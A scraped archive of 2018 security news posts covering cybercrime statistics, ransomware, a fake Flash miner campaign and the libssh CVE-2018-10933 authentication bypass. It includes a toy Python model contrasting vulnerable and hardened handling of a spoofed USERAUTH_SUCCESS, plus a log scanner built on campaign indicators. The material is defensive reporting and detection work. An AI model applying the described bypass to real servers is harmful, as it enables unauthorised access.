Category Archives: cyber crime

Author of Luminosity RAT Gets 2.5 Years in Federal Prison

By Waqas

Colton Ray Grubbs, 21, from Stanford, Kentucky, has been sentenced to 30 months (2.5 years) in prison for developing and operating the infamous Luminosity RAT, or Luminosity Link RAT (Remote Access Trojan), which targeted unsuspecting users worldwide. Luminosity RAT allowed hackers to infect targeted devices by automatically disabling the anti-malware or anti-virus program installed on the system to spy […]

This is a post from HackRead.com. Read the original post: Author of Luminosity RAT Gets 2.5 Years in Federal Prison

Security Affairs: Group-IB: 14 cyber attacks on crypto exchanges resulted in a loss of $882 million

Group-IB has estimated that crypto exchanges suffered a total loss of $882 million due to targeted attacks between 2017 and 2018.

Group-IB, an international company that specializes in preventing cyber attacks, has estimated that cryptocurrency exchanges suffered a total loss of $882 million due to targeted attacks in 2017 and in the first three quarters of 2018. According to Group-IB experts, at least 14 crypto exchanges were hacked. Five attacks have been linked to North Korean hackers from the state-sponsored Lazarus group, including the infamous attack on the Japanese crypto exchange Coincheck, in which $534 million in crypto was stolen.

This data was included in the annual Hi-Tech Crime Trends 2018 report, presented by Group-IB CTO Dmitry Volkov at the sixth international CyberCrimeCon conference. A separate chapter of the report is dedicated to the analysis of hackers’ and fraudsters’ activity in the crypto industry.

Crypto exchanges: in the footsteps of Lazarus 

In most cases, cybercriminals attacking cryptocurrency exchanges use traditional tools and methods, such as spear phishing, social engineering, malware distribution, and website defacement. One successful attack can bring hackers tens of millions of dollars in crypto funds while keeping the risk of being caught to a minimum: the anonymity of transactions allows cybercriminals to withdraw stolen funds without exposing themselves to greater risk.

Spear phishing remains the major attack vector against corporate networks. For instance, fraudsters deliver malware under the cover of CV spam: they send an email containing a fake CV with the subject line “Engineering Manager for Crypto Currency job” or an attachment named «Investment Proposal.doc» with malware embedded in the document.

In the last year and a half, the North Korean state-sponsored Lazarus group attacked at least five cryptocurrency exchanges: Yapizon, Coinis, YouBit, Bithumb, and Coincheck. After the local network is successfully compromised, the hackers browse it to find the workstations and servers used to work with the exchange’s private cryptocurrency wallets.


“Last year we warned that hackers competent enough to carry out a targeted attack might have a new target – cryptocurrency exchanges,” said Dmitry Volkov, Group-IB CTO.

“In the last couple of years, crypto exchanges suffered many attacks. Some of the exchanges went bankrupt after the hacks, i.e. Bitcurex, YouBit, Bitgrail. At the beginning of 2018 hackers’ interest in cryptocurrency exchanges ramped up. The most likely cryptocurrency exchange attackers now are Silence, MoneyTaker, and Cobalt.”

ICO: more than 56% of funds were stolen through phishing attacks

Hackers cause serious damage to ICOs: they attack founders, community members, and platforms. In 2017 more than 10% of funds raised through ICOs were stolen, while 80% of projects disappeared with the money without fulfilling any obligations towards their investors.

Yet despite the pessimistic forecasts, the amount of funds invested in ICOs increased significantly. In H1 2018 alone, ICO projects raised almost $14 billion, twice as much as during the whole of 2017 ($5.5 billion), according to CVA and PwC studies. Cybercriminals can therefore steal more funds in a single successful attack.

In 2018, hackers attacked ICOs conducting private funding rounds. For instance, cyber criminals targeted the TON project, founded by Pavel Durov, through phishing and managed to steal $35,000 in Ethereum. The worst generally happens on the first day of a token sale: a set of DDoS attacks coinciding with an influx of users, a flood of Telegram and Slack messages, and mailing-list spamming.

Phishing remains one of the major attack vectors against ICOs: approximately 56% of all funds stolen from ICOs were siphoned off through phishing attacks. At the height of “the crypto-fever” everyone is striving to purchase tokens, often sold at a significant discount, as fast as possible, without paying attention to fine details such as fake domain names. One big phishing group is capable of stealing roughly $1 million a month.

Phishing attacks against ICO projects are not always aimed at stealing money. This year, there were several cases of investor database theft. This information can be later re-sold on the darknet or used for blackmail.

A relatively new method of fraud on the ICO market was stealing a White Paper of an ICO project and presenting an identical idea under a new brand name. Fraudsters build a website to feature a new brand and a new team using the stolen project description and announce an ICO.

Pierluigi Paganini

(Security Affairs – crypto exchanges, hacking)

The post Group-IB: 14 cyber attacks on crypto exchanges resulted in a loss of $882 million appeared first on Security Affairs.

Authorities search & seize properties of GTA V’s “Infamous” cheat developers

By Carolina

Cheat developers are constantly on the radar of Take-Two Interactive and Rockstar Games. Both companies have previously taken legal action against cheat developers to protect their games, including the very popular Grand Theft Auto V (GTA V). Last month, they launched an operation against Australian developers who had released a well-known mod-menu cheat for GTA […]

This is a post from HackRead.com. Read the original post: Authorities search & seize properties of GTA V’s “Infamous” cheat developers

Thousands of servers easy to hack due to a LibSSH Flaw

The Libssh library is affected by a severe flaw that could be exploited by attackers to completely bypass authentication and take over a vulnerable server.

Libssh, a Secure Shell (SSH) implementation library, is affected by a four-year-old severe vulnerability that could be exploited by attackers to completely bypass authentication and take over a vulnerable server without requiring a password.

The flaw is an authentication-bypass vulnerability that was introduced in Libssh version 0.6, released in 2014.

The issue, tracked as CVE-2018-10933, was discovered by Peter Winter-Smith of NCC Group and stems from a coding error in Libssh.

Exploitation of the flaw is trivial: an attacker only needs to send an “SSH2_MSG_USERAUTH_SUCCESS” message to a server with SSH enabled at the point where it expects an “SSH2_MSG_USERAUTH_REQUEST” message.

“libssh versions 0.6 and above have an authentication bypass vulnerability in the server code. By presenting the server an SSH2_MSG_USERAUTH_SUCCESS message in place of the SSH2_MSG_USERAUTH_REQUEST message which the server would expect to initiate authentication, the attacker could successfully authenticate without any credentials,” reads the security advisory.

The library fails to validate if the incoming “successful login” packet was sent by the server or the client, and also fails to check if the authentication process has been successfully completed.

This means that if a remote attacker sends the “SSH2_MSG_USERAUTH_SUCCESS” response to libssh, the library considers that the authentication has been successfully completed.
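To make the two missing checks concrete, here is a toy model of the server-side userauth state machine, written for this article as an added example; it is not libssh code. It contrasts a handler that accepts a peer-supplied USERAUTH_SUCCESS (the defect described above) with one that enforces message direction and authentication state; the message numbers are the real RFC 4252 values, while the credential store and the DISCONNECT marker are constructed for the demo.

```python
from dataclasses import dataclass, field
from typing import Optional

# SSH userauth message numbers (RFC 4252, section 6).
SSH2_MSG_USERAUTH_REQUEST = 50   # client -> server
SSH2_MSG_USERAUTH_FAILURE = 51   # server -> client
SSH2_MSG_USERAUTH_SUCCESS = 52   # server -> client
DISCONNECT = "DISCONNECT"        # hypothetical marker: tear the connection down

# The only message type a client may legitimately send while the server is
# in the userauth state. USERAUTH_SUCCESS is deliberately absent: it flows
# from server to client, never the other way round.
CLIENT_TO_SERVER_USERAUTH = frozenset({SSH2_MSG_USERAUTH_REQUEST})

# Constructed sample credential store for the demo (not real accounts).
SAMPLE_USERS = {"alice": "correct horse battery staple"}


@dataclass
class ServerSession:
    authenticated: bool = False
    events: list = field(default_factory=list)   # what a defender would log


def check_credentials(user: Optional[str], password: Optional[str]) -> bool:
    """Stand-in for a real credential check against the sample store."""
    return user in SAMPLE_USERS and SAMPLE_USERS[user] == password


def vulnerable_handle(session: ServerSession, msg_type: int, payload: dict):
    """Models the defect: the server neither checks that USERAUTH_SUCCESS is a
    server-to-client message nor that authentication actually completed, so a
    peer that sends it is simply marked authenticated."""
    if msg_type == SSH2_MSG_USERAUTH_SUCCESS:
        session.authenticated = True          # the bug: trusts the peer's claim
        return SSH2_MSG_USERAUTH_SUCCESS
    if msg_type == SSH2_MSG_USERAUTH_REQUEST:
        if check_credentials(payload.get("user"), payload.get("password")):
            session.authenticated = True
            return SSH2_MSG_USERAUTH_SUCCESS
        return SSH2_MSG_USERAUTH_FAILURE
    return None


def hardened_handle(session: ServerSession, msg_type: int, payload: dict):
    """Corrected logic: anything that is not valid client-to-server userauth
    traffic is a protocol violation, logged and answered with a disconnect.
    The authenticated flag changes only after a verified USERAUTH_REQUEST."""
    if msg_type not in CLIENT_TO_SERVER_USERAUTH:
        session.events.append(
            f"protocol violation: unexpected msg {msg_type} during userauth")
        return DISCONNECT
    user = payload.get("user")
    if check_credentials(user, payload.get("password")):
        session.authenticated = True
        session.events.append(f"auth ok user={user}")
        return SSH2_MSG_USERAUTH_SUCCESS
    session.events.append(f"auth failed user={user}")
    return SSH2_MSG_USERAUTH_FAILURE


def run_spoofed_success(handler) -> ServerSession:
    """Deliver the single out-of-place USERAUTH_SUCCESS the advisory describes
    to a fresh session and return the resulting server state."""
    session = ServerSession()
    handler(session, SSH2_MSG_USERAUTH_SUCCESS, {})
    return session


def run_password_login(handler, user: str, password: str) -> ServerSession:
    """Ordinary password authentication through the given handler."""
    session = ServerSession()
    handler(session, SSH2_MSG_USERAUTH_REQUEST,
            {"user": user, "password": password})
    return session


if __name__ == "__main__":
    print("vulnerable, spoofed SUCCESS ->",
          run_spoofed_success(vulnerable_handle).authenticated)   # True
    hardened = run_spoofed_success(hardened_handle)
    print("hardened,   spoofed SUCCESS ->", hardened.authenticated,
          hardened.events)                                        # False
    print("hardened,   valid password  ->",
          run_password_login(hardened_handle, "alice",
                             SAMPLE_USERS["alice"]).authenticated)  # True
```

The logged "protocol violation" line is the signal a defender would alert on: a client has no legitimate reason to emit message type 52 at all.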

Thousands of vulnerable servers are exposed online: a query of the Shodan search engine shows that more than 6,500 servers are affected by the issue.

But before you get frightened, you should know that neither the widely used OpenSSH nor Github’s implementation of libssh was affected by the vulnerability.

The Libssh maintainers addressed the flaw with the release of the libssh versions 0.8.4 and 0.7.6.

Experts pointed out that GitHub and OpenSSH implementations of the libssh library are not affected by the flaw.

Pierluigi Paganini

(Security Affairs – Libssh, CVE-2018-10933)

The post Thousands of servers easy to hack due to a LibSSH Flaw appeared first on Security Affairs.

A crippling ransomware attack hit a water utility in the aftermath of Hurricane Florence

A water utility in the US state of North Carolina suffered a severe ransomware attack in the week after Hurricane Florence hit the East Coast of the U.S.

According to the Onslow Water and Sewer Authority (aka ONWASA) some internal systems were infected with the Emotet malware, but the regular water service was not impacted.

According to ONWASA, the infections will require several of the main databases to be completely recreated; fortunately, no customer information was compromised.

“We are in the middle of another disaster following Hurricane Florence and tropical storm Michael,” CEO Jeff Hudson told employees in a video posted on Facebook.

“With a very sophisticated attack they penetrated our defenses, just as they penetrated the city of Atlanta and Mecklenburg county.”


ONWASA CEO Jeffrey Hudson confirmed that the attack began on October 4. The IT staff initially thought they had locked out the threat; however, on October 13 the malware started dropping the Ryuk ransomware onto the infected systems.

“An ONWASA IT staff member was working at 3am and saw the attack,” ONWASA said.

“IT staff took immediate action to protect system resources by disconnecting ONWASA from the internet, but the crypto-virus spread quickly along the network encrypting databases and files.”

Operators at the utility did not pay the ransom and opted to rebuild the infected systems instead.

“Ransom monies would be used to fund criminal, and perhaps terrorist activities in other countries,” ONWASA reasoned. “Furthermore, there is no expectation that payment of a ransom would forestall repeat attacks.”

The incident response had a significant impact on the utility’s operations at a critical moment, the aftermath of Hurricane Florence.

ONWASA estimates it will take several weeks to rebuild all of the damaged systems; in the meantime customers will not be able to pay their bills online, and major delays will affect the services provided by the utility.

The effects of Hurricane Florence on Onslow County were significant: schools are still closed and local authorities are still working to clean up debris from the massive storm. The cost of restoring normal conditions has been estimated at $125m.

Pierluigi Paganini

(Security Affairs – Hurricane Florence, ransomware)

The post A crippling ransomware attack hit a water utility in the aftermath of Hurricane Florence appeared first on Security Affairs.

Security Affairs: Online market for counterfeit goods in Russia has reached $1,5 billion

Group-IB: The online market for counterfeit goods in Russia has reached $1,5 billion, while the number of phishing attacks has surpassed 1,200 daily

Group-IB, an international company that specialises in the prevention of cyber attacks, has estimated that online sales of counterfeit goods are now worth $1.5 billion. This information was first made public by experts from Group-IB’s Brand Protection team at the CyberCrimeCon 2018 international cybersecurity conference.

According to Group-IB, the online market for counterfeit goods in Russia has increased by 23% in a year and totaled more than $1.5 billion in 2017, compared to $1.2 billion in 2016. Fraudsters use their websites to sell household appliances and computer equipment, clothing and footwear, jewelry, accessories, cosmetics, medicinal products, and much more, often at hugely discounted prices – up to 80% off. According to Group-IB’s statistics, every fifth counterfeit product was bought online. On average, Russians spend $78 per year on counterfeit goods.

“For large organisations, the actions of online fraudsters mean not only a direct loss in revenue, but also damaged customer loyalty, brand abuse, and fewer shoppers,” says Andrey Busargin, Director of Brand Protection at Group-IB. “It also leads to a decrease in what we call the psychological price, i.e. the cost that customers are willing to pay for a product from the official retailer. Around 64% of users stop buying a company’s goods after a negative experience.”

Counterfeit goods are not the only threat to popular brands on the Internet. Scammers create fake websites of known brands, fraudulent promotional campaigns, and fake accounts on social media. In recent years, an often-used fraud method has been fake mobile applications: 36% of users are unable to distinguish between genuine and fake apps, and 60% of the latter request access to the user’s personal data.

Fraudsters use various ways to deceive users: phishing websites, fake mobile apps, and accounts and groups on social media. Phishing remains one of the most common forms of online fraud. According to the experts from Group-IB Brand Protection, around 1,270 phishing attacks are carried out daily. The main goals of phishing resources are stealing money from bank cards and obtaining login credentials to personal accounts.

Scammers do not simply copy a company’s website, brand, logos, and colors in addition to registering a similar domain name; they also use the same promotional methods as the legal resources. To secure the traffic they need, scammers ensure that their websites appear at the top of search engine results: 96% of users click on links found on the first page displayed by search engines. Only 35% of them are official resources, however.

Contextual advertising also plays a role: for only $15, it is possible to buy 100 guaranteed visits to a phishing website. Scammers also buy banner ads, use search engine optimisation (SEO), and social media promotion (every day, around 150 social media users are deceived by fraudsters on average). In addition to technological ways of attracting traffic by using bots that target opinion leaders, scammers do not shy away from the classic tactic of mass email blasts purporting to be from popular brands, with 20% of users opening emails that contain content that is characteristic of malware or phishing.

Given that users blindly trust influencers (68% of people choose goods or services based on feedback on social media), scammers create fake accounts. For example, a fake account in Pavel Durov’s name brought in more than $50,000 within a couple of hours of being created. According to Group-IB, 43% of celebrities and 31% of politicians have fake accounts that use their names.

“Fighting online fraudsters and counterfeiting requires adopting serious countermeasures,” warns Andrey Busargin.

“We advise companies to continuously track phishing resources and monitor references to their brand in domain name databases, search engine results, social media, messengers, and context ads so as to identify scammers hiding behind the company’s brand. It is also important to monitor mobile applications, in both official and unofficial stores, in addition to forums, search engine results, social media, and websites where they might be found. To effectively fight against scammers and fraudsters, it is important to detect and block all the resources connected with a fraudulent website. Fraudsters usually create several phishing websites at once, which can be detected using correlation and website affiliation analysis.”

About the author: Group-IB

Group-IB is one of the world’s leading providers of solutions aimed at the detection and prevention of cyber attacks, fraud exposure, and the protection of intellectual property on the Internet. The GIB Threat Intelligence cyber threat data collection system has been named one of the best in class by Gartner, Forrester, and IDC.

Group-IB’s technological leadership is built on the company’s fifteen years of hands-on experience in cybercrime investigations all over the world and 55,000 hours of cyber security incident response accumulated in the largest forensic laboratory in Eastern Europe and a round-the-clock centre providing rapid response to cyber incidents, CERT-GIB.

Group-IB is a partner of INTERPOL, Europol, and a cybersecurity solutions provider, recommended by SWIFT and OSCE.

Pierluigi Paganini

(Security Affairs – counterfeit goods, cybercrime)

The post Online market for counterfeit goods in Russia has reached $1,5 billion appeared first on Security Affairs.

HACKMAGEDDON: January – September 2018 Cyber Attack Statistics

I have decided to write a dedicated blog post with all the attacks recorded so far in 2018 and the related statistics (with interactive charts). Some charts are also compared with the corresponding stats for 2017. The timeline contains all the events, and I will try to keep it updated on a monthly basis.


Security Affairs: Ex-NASA contractor pleaded guilty for cyberstalking crimes

A former NASA contractor has pleaded guilty in a cyberstalking scheme: the man blackmailed seven women, threatening to publish their nude pictures.

Richard Bauer (28), an ex-NASA contractor, has pleaded guilty to cyberstalking; the man allegedly threatened to publish nude pictures of the women unless they sent him other explicit pictures.

Richard Bauer of Los Angeles, who worked at NASA’s Armstrong Flight Research Center in Southern California, pleaded guilty to stalking, computer hacking, and aggravated identity theft.


The man acknowledged having targeted friends, co-workers, and family members; he used social engineering tricks and also used malware to compromise victims’ systems.

“Bauer acknowledged victimizing friends, family members, high school and college acquaintances and co-workers.” states the Associated Press.

“Bauer, pretending to ask questions on Facebook for a class, got some victims to reveal information he used to reset their online passwords and harvest photos. He got other victims to install computer malware allowing him to access their computers.”

Bauer allegedly threatened to post the nude pictures of the victims that he had stolen unless they sent more photos.

Pierluigi Paganini

(Security Affairs – cyberstalking, hacking)

The post Ex-NASA contractor pleaded guilty for cyberstalking crimes appeared first on Security Affairs.

Security Affairs newsletter Round 184 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web”, is online with a special deal.

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

· APT28 group return to covert intelligence gathering ops in Europe and South America.
· D-Link fixed several flaws in Central WiFiManager access point management tool
· Expert presented a new attack technique to compromise MikroTik Routers
· Google was aware of a flaw that exposed over 500,000 of Google Plus users, but did not disclose it
· Kaspersky shed lights on the overlap of operations conducted by Turla and Sofacy
· The Git Project addresses a critical arbitrary code execution vulnerability in Git
· WECON PI Studio HMI software affected by code execution flaws
· BEC scams, hacked accounts available from $150 up to $5,000
· How Secure Are Bitcoin Wallets, Really?
· Project Strobe, what will change after the Google security breach?
· Researchers presented an improved version of the WPA KRACK attack
· CVE-2018-8453 Zero-Day flaw exploited by FruityArmor APT in attacks aimed at Middle East
· GAO report reveals new Pentagon weapon systems vulnerable to hack
· Group-IB: $49.4 million of damage caused to Russia’s financial sector from cyber attacks
· Hackers can compromise your WhatsApp account by tricking you into answering a video call
· Millions of Xiongmai video surveillance devices can be easily hacked via cloud feature
· Exaramel Malware Links Industroyer ICS malware and NotPetya wiper
· Juniper Networks provides dozens of fix for vulnerabilities in Junos OS
· New Gallmaker APT group eschews malware in cyber espionage campaigns
· SAP October 2018 set of patches fixes first Hot News security note for SAP BusinessObjects in 5 years
· DOM-XSS Bug Affecting Tinder, Shopify, Yelp, and More
· Facebook Data Breach Update: attackers accessed data of 29 Million users
· Fitmetrix fitness software company may have exposed millions of customer records
· Five Eyes Intelligence agencies warn of popular hacking tools
· Hackers targeting Drupal vulnerabilities to install the Shellbot Backdoor
· Experts warn of fake Adobe Flash update hiding a miner that works as a legitimate update
· NHS is still assessing the cost of WannaCry one year later
· Pentagon Defense Department travel records data breach

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 184 – News of the week appeared first on Security Affairs.

Experts warn of fake Adobe Flash update hiding a miner that works as a legitimate update

Security experts from Palo Alto Networks warn of a fake Adobe Flash update that hides a cryptocurrency miner but behaves like a legitimate update and really does update the software.

A fake Adobe Flash update was used as the delivery vector for a malicious cryptocurrency miner; the novelty of this latest campaign lies in the tricks the attackers use to drop the malware stealthily.

The fake Adobe Flash update has been actively used in a campaign since this summer. It borrows code from the legitimate update and actually updates the victim’s software, but it also includes code that downloads an XMRig cryptocurrency miner onto Windows systems.

“However, a recent type of fake Flash update has implemented additional deception. As early as August 2018, some samples impersonating Flash updates have borrowed pop-up notifications from the official Adobe installer.” reads the analysis published by Palo Alto Networks.

“These fake Flash updates install unwanted programs like an XMRig cryptocurrency miner, but this malware can also update a victim’s Flash Player to the latest version.”

fake Adobe Flash update

The fake Adobe Flash updates use file names starting with AdobeFlashPlayer and are hosted on cloud-based web servers that don’t belong to Adobe.

The download URLs always include the string “flashplayer_down.php?clickid=”.

At the time of the report, it was still unclear how the attackers were spreading the URLs that deliver the fake Adobe Flash update.

Network traffic analysis revealed that the infected Windows hosts connect to osdsoft[.]com via HTTP POST requests. This domain is associated with other updaters or installers pushing cryptocurrency miners and other unwanted software.

“This domain is associated with updaters or installers pushing cryptocurrency miners and other unwanted software. One such example from December 2017 named free-mod-menu-download-ps3.exe also shows osdsoft[.]com followed by XMRig traffic on TCP port 14444 like the example used in this blog.” continues the report.

“However, other malware samples reveal osdsoft[.]com is associated with other unwanted programs usually classified as malware.”

Palo Alto Networks experts highlighted that potential victims will still receive the usual Windows warning messages about running downloaded files, so the fake installer is not completely silent.

“This campaign uses legitimate activity to hide distribution of cryptocurrency miners and other unwanted programs,” concludes the analysis.

“Organizations with decent web filtering and educated users have a much lower risk of infection by these fake updates.”
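A log-scanning example added here (not code from the Palo Alto Networks report or from Security Affairs) that checks proxy log lines against the indicators described above: the flashplayer_down.php?clickid= download URL, AdobeFlashPlayer-named installers fetched from hosts outside adobe.com, HTTP POSTs to osdsoft[.]com, and connections to TCP port 14444. The log format, client addresses, and every hostname other than osdsoft.com are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Indicators taken from the Palo Alto Networks write-up summarised above.
FAKE_UPDATE_URL_MARKER = "flashplayer_down.php?clickid="
FAKE_UPDATE_FILE_PREFIX = "AdobeFlashPlayer"
MINER_DOMAIN = "osdsoft.com"        # written defanged as osdsoft[.]com in the report
XMRIG_PORT = 14444                  # XMRig traffic was seen on TCP 14444
LEGIT_ADOBE_SUFFIXES = ("adobe.com",)

# Constructed log format (not any real proxy product's format):
#   <timestamp> <client_ip> <method> <url> <dst_port>
# For CONNECT lines the url column is written as tcp://host:port.
LOG_RE = re.compile(r"^(\S+) (\S+) (GET|POST|CONNECT) (\S+) (\d+)$")

# Constructed sample log: one legitimate Adobe download, one infection chain, one benign hit.
SAMPLE_LOG = """\
2018-10-12T09:14:03Z 10.1.2.30 GET https://fpdownload.adobe.com/get/flashplayer/AdobeFlashPlayerInstaller.exe 443
2018-10-12T09:15:41Z 10.1.2.31 GET http://cdn-updates.example/flashplayer_down.php?clickid=abc123 80
2018-10-12T09:15:52Z 10.1.2.31 GET https://files.example.net/dl/AdobeFlashPlayer_31.0.exe 443
2018-10-12T09:16:10Z 10.1.2.31 POST http://osdsoft.com/report.php 80
2018-10-12T09:16:30Z 10.1.2.31 CONNECT tcp://198.51.100.7:14444 14444
2018-10-12T09:20:00Z 10.1.2.32 GET https://www.example.org/index.html 443
""".splitlines()


def _is_adobe_host(host):
    """True when the host is adobe.com or one of its subdomains."""
    host = host.lower()
    return any(host == s or host.endswith("." + s) for s in LEGIT_ADOBE_SUFFIXES)


def classify(line):
    """Return a list of (rule, detail) findings for one log line; [] when nothing matches."""
    m = LOG_RE.match(line.strip())
    if not m:
        return []
    _ts, client, method, url, port = m.groups()
    parsed = urlparse(url)
    host = parsed.hostname or ""
    filename = parsed.path.rsplit("/", 1)[-1]
    findings = []
    # Rule 1: the campaign's download URLs always carry this query string.
    if FAKE_UPDATE_URL_MARKER in url:
        findings.append(("fake-flash-download-url", f"{client} fetched {url}"))
    # Rule 2: an AdobeFlashPlayer* installer served from a server that is not Adobe's.
    if filename.startswith(FAKE_UPDATE_FILE_PREFIX) and not _is_adobe_host(host):
        findings.append(("flash-installer-off-adobe", f"{client} fetched {filename} from {host}"))
    # Rule 3: infected hosts POST to the domain associated with the miner installers.
    if method == "POST" and host == MINER_DOMAIN:
        findings.append(("post-to-miner-domain", f"{client} POST to {host}"))
    # Rule 4: the XMRig traffic in the report used TCP port 14444.
    if int(port) == XMRIG_PORT:
        findings.append(("xmrig-port", f"{client} -> {host}:{port}"))
    return findings


def scan_proxy_log(lines):
    """Scan an iterable of log lines; return (line_number, rule, detail) tuples."""
    out = []
    for n, line in enumerate(lines, 1):
        for rule, detail in classify(line):
            out.append((n, rule, detail))
    return out


if __name__ == "__main__":
    for n, rule, detail in scan_proxy_log(SAMPLE_LOG):
        print(f"line {n}: {rule}: {detail}")
```

The legitimate fpdownload.adobe.com download on the first line produces no finding, while each stage of the constructed infection chain trips exactly one rule.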

Pierluigi Paganini

(Security Affairs – fake Adobe Flash update, hacking)

The post Experts warn of fake Adobe Flash update hiding a miner that works as a legitimate update appeared first on Security Affairs.

Dark web kingpin visiting US for beard competition gets 20 years in prison

By Waqas

Dream Market Drug Vendor arrived in the US to participate in a beard competition in Texas. A Dark Web drug dealer has received 240 months or 20 years in prison after he pleaded guilty to the crimes of laundering money and possessing controlled substances with the intention of distributing them. The convict, Gal Vallerius, is […]

This is a post from HackRead.com Read the original post: Dark web kingpin visiting US for beard competition gets 20 years in prison

Security Affairs: Group-IB: $49.4 million of damage caused to Russia’s financial sector from cyber attacks

Security firm Group-IB has estimated that in H2 2017-H1 2018 cyber attacks caused $49.4 million (2.96 billion rubles) of damage to Russia’s financial sector.

Group-IB, an international company that specializes in preventing cyber attacks, has estimated that in H2 2017-H1 2018 cyber attacks caused $49.4 million (2.96 billion rubles) of damage to Russia’s financial sector. As stated in Group-IB’s annual report “Hi-Tech Crime Trends 2018” presented at the CyberCrimeCon18 conference, every month, 1-2 banks lose money as a result of cyber attacks, and the damage caused by one successful theft is, on average, $2 million.

“Financial motivation still prevails among APT groups; however, stolen money is not the most dangerous thing that could happen to a financial organization,” says Ilya Sachkov, Group-IB CEO and founder. “Since in many countries banks are considered critical infrastructure, they are the targets for state-sponsored hacker groups specialized in sabotage. One successful attack is capable of destroying a financial organization and even causing the collapse of a state financial system. Considering this, banks need to rethink their approach to protection against cyber threats. Defense is an outdated strategy. It’s time to stop being victims and become hunters.”

financial sector Russia attacks

In the new report, Group-IB experts described in detail the cyber threats to the financial sector—active APT groups, tactics of the attackers, infection vectors, and new hacker tools.

Targeted attacks on banks:

Active groups and withdrawal methods

Group-IB identifies 4 criminal APT groups that pose a real threat to the financial sector: not only are they able to penetrate a bank’s network and access isolated financial systems, but they can also successfully withdraw money via SWIFT, AWS CBR, card processing and ATMs. These groups are Cobalt, MoneyTaker, Silence, which are led by Russian-speaking hackers, and the North Korean group Lazarus.

Only two criminal groups pose a threat to the SWIFT interbank transfer system: Lazarus and Cobalt, the latter of which, at the end of 2017, conducted the first successful attack in the history of Russia’s financial sector on a bank using SWIFT. According to Group-IB estimates, the number of targeted attacks on banks to conduct thefts via SWIFT in the reporting period increased threefold. In the previous period, three such attacks were recorded: in Hong Kong, Ukraine, and Turkey. In this period, however, there have already been 9 successful attacks in Nepal, Taiwan, Russia, Mexico, India, Bulgaria, and Chile. The good news is that with SWIFT most of the unauthorized transfers can be stopped in time and returned to the banks affected.

Attacks on card processing remain one of the main methods of theft and they are actively used by hackers from Cobalt, MoneyTaker, and Silence. In February 2018, members of Silence conducted a successful attack on a bank and stole money via card processing: they managed to withdraw $522,000 (35 million rubles) from cards via the ATMs of a partner bank. Focusing attacks on ATMs and card processing led to a reduction in the average amount of damage from one attack. However, they allow attackers to conduct these attacks more securely for “drops” who cash out the stolen money. The attackers are in one country, their victim (the bank) in another, and the cashing out is done in a third country.

Withdrawing money through the AWS CBR (Automated Work Station Client of the Russian Central Bank) is actively used by MoneyTaker—in November 2017, they managed to withdraw $104,000 (7 million rubles), but in summer 2018, they successfully stole $865,000 (58 million rubles) from PIR Bank. MoneyTaker has already conducted 16 attacks in the US, 5 on banks in Russia, and 1 in the UK. In the US, the average amount of damage from one attack is $500,000. In Russia, the average amount of funds withdrawn is $1.1 million (72 million rubles). In December 2017, Group-IB published the first report on this group: “MoneyTaker: 1.5 Years of Silent Operations”.

In the designated period, only Cobalt conducted attacks on payment gateways. In 2017, they used this method to steal money from two companies; however, no attempts were made in 2018. They were helped in one of their attacks by members of the group Anunak, which had not conducted an attack of this kind since 2014. Despite the arrest of the gang’s leader in Spain in spring 2018, Cobalt continues to be one of the most active and aggressive groups, steadily attacking financial organizations in Russia and abroad 2-3 times a month.

Attacks on bank customers:

The decline of Android Trojans and the triumph of phishing

In Russia, according to Group-IB experts, there are no longer any groups left that conduct thefts from individuals using banking Trojans for PCs. This decline in the threat from PC banking Trojans has been continuing in Russia since 2012.

At present, only three criminal groups—Buhtrap2, RTM, and Toplel—steal money from the accounts of legal entities in Russia. Group-IB experts noted a change in the attackers’ tactics in the second half of 2017: the vector for the distribution of Trojans was no longer the traditional malicious campaigns or hacked popular sites, but the creation of new tailored resources for accountants and company executives who use remote banking systems (RBSs), payment systems, or cryptocurrency wallets in their work. On the fake resources, the criminals placed code designed to download the Buhtrap and RTM Trojans.

Unlike in Russia, on the global stage, the cyber threat landscape has undergone far greater changes. Six new banking Trojans for PCs have emerged: IcedID, BackSwap, DanaBot, MnuBot, Osiris and Xbot. Among the new Trojans, we would like to highlight BackSwap, which initially only attacked banks in Poland, but then moved on to banks in Spain. BackSwap is interesting because it simultaneously implemented several new techniques of introducing code to automatically replace payment details. The greatest threat for bank customers still comes from criminal groups that use the Dridex, Trickbot, and Gozi Trojans.

Over the last year, Group-IB experts have noted a decline in Russia of the epidemic of infecting smartphones with Android Trojans, after several years of rapid growth. The number of daily thefts committed using Android Trojans in Russia decreased almost threefold, and the average amount of theft decreased from $164 to $104. New Android Trojans—Easy, Exobot 2.0, CryEye, Cannabis, fmif, AndyBot, Loki v2, Nero banker, Sagawa and others—that are put up for sale or hire on hacker forums are primarily intended for use outside of Russia. An exception to this is the malware Banks in Your Hand. The Trojan was disguised as a financial app intended to be used as an “aggregator” of the mobile banking systems of Russia’s leading banks. Every day, the Trojan stole between $1,500 and $7,500 from users; however, in March 2018, with Group-IB’s assistance, the criminals were detained by the police. Another cause of the reduction in damage to customers is that banks and payment systems have introduced early fraud detection technologies based on behavioral analysis algorithms, which can detect attacks that combine social engineering scams, phishing, botnets, illegal money withdrawal networks, multi-channel fraud and other types of banking fraud across all customer devices and platforms.

There has been a significant rise in the number of crimes committed using web phishing and fake websites of banks, payment systems, telecoms operators, online stores and famous brands. Using web phishing, criminals have managed to steal $3.7 million (251 million rubles), which is 6% more than in the previous period. On average, approximately $15 is stolen in each phishing attack. According to Group-IB estimates, the number of groups that create phishing websites imitating Russian brands has increased from 15 to 26. As for global trends, as expected, the greatest number of websites for financial phishing is registered in the USA. They account for 80% of all financial phishing sites. France is in second place, followed by Germany.

Group-IB’s CEO, Ilya Sachkov, notes that to defeat cyber crime, we need to synchronize the law at state level, hit the economic base and funding channels of criminals, and introduce a moratorium on the development and sale of digital weapons that may end up in criminal hands.

“Cyber security must be a priority paradigm for people, business, and the state. It is thought that countering cyber threats is a typical competition of armor and equipment. This is why the protection paradigm itself has now changed: the main idea is to be a few steps ahead of the cyber criminals and stop crimes from happening in the first place.”

About the author: Group-IB

Group-IB is one of the world’s leading providers of solutions aimed at the detection and prevention of cyber attacks, fraud exposure and protection of intellectual property on the Internet. The GIB Threat Intelligence cyber threat data collection system has been named one of the best in class by Gartner, Forrester, and IDC.

